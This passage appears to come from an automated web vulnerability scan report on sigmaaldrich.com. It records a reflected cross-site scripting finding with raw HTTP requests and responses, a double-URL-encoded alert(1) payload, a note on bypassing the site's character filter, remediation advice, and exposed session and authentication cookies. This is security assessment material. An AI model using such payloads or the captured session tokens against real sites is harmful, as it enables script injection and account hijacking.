Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:58 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest1c6d1";alert(1)//c5eabbb08ea/life-science/zinc-finger-nuclease-technology/custom-zfn","E404") ;
   </script>
...[SNIP]...

1.129. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 648e3%2522%253balert%25281%2529%252f%252f8a4b807a60d was submitted in the REST URL parameter 4. This input was echoed as 648e3";alert(1)//8a4b807a60d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science648e3%2522%253balert%25281%2529%252f%252f8a4b807a60d/zinc-finger-nuclease-technology/custom-zfn HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d